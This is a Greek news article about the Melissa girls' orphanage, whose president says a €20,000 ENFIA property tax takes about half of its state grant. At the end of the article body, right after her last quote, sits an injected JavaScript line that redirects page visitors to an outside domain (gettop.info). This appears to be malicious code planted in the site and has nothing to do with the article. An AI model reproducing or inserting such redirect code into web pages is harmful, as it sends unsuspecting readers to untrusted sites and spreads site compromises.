Δυσβάστακτος ΕΝΦΙΑ 20.000 € στο ίδρυμα ίδρυμα «Μέλισσα»

0
1

 

Σε «τραγική κατάσταση» βρίσκεται το Ορφανοτροφείο Θηλέων «Μέλισσα», καθώς, όπως εξήγησε στον ραδιοφωνικό σταθμό του Αθηναϊκού-Μακεδονικού Πρακτορείου Ειδήσεων «Πρακτορείο 104,9 FM» η πρόεδρος του ιδρύματος Θεοφανώ Παπαζήση, καλείται να πληρώσει 20.000 ευρώ ΕΝΦΙΑ.

Η κ. Παπαζήση τόνισε ότι ο ΕΝΦΙΑ ισοδυναμεί περίπου με το ήμισυ της κρατικής επιχορήγησης που λαμβάνουν (τη φετινή δεν την έχουν λάβει ακόμη).

«Είναι σαν να μας δίνει το κράτος ένα χρηματικό ποσό για να μας ενισχύσει και στη συνέχεια να ζητά να του επιστρέψουμε πίσω τα μισά» σημείωσε η πρόεδρος του Ιδρύματος.

Πρόσθεσε ακόμη ότι τα ακίνητα που έχουν στην κατοχή τους προς εκμετάλλευση είναι παλιά και τα έσοδα μικρά. Ανάμεσα στα ακίνητα που τους ανήκουν είναι και το γνωστό νεοκλασικό, άνω των 100 ετών, που βρίσκεται στη Βασ. Όλγας 36, το οποίο στο παρελθόν στέγαζε το ίδρυμα.

«Μέχρι πριν από περίπου πέντε χρόνια τα φιλανθρωπικά ιδρύματα δεν πλήρωναν φόρους. Τώρα, εκτός από τους φόρους εισοδήματος, πληρώνουμε και ΕΝΦΙΑ. Εμείς όμως είμαστε ένα μικρό ίδρυμα που επιβιώνουμε με τα έσοδα αυτών των ακινήτων και κάποιες περιορισμένες πλέον δωρεές από τον κόσμο» υπογράμμισε η κ.Παπαζήση. setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here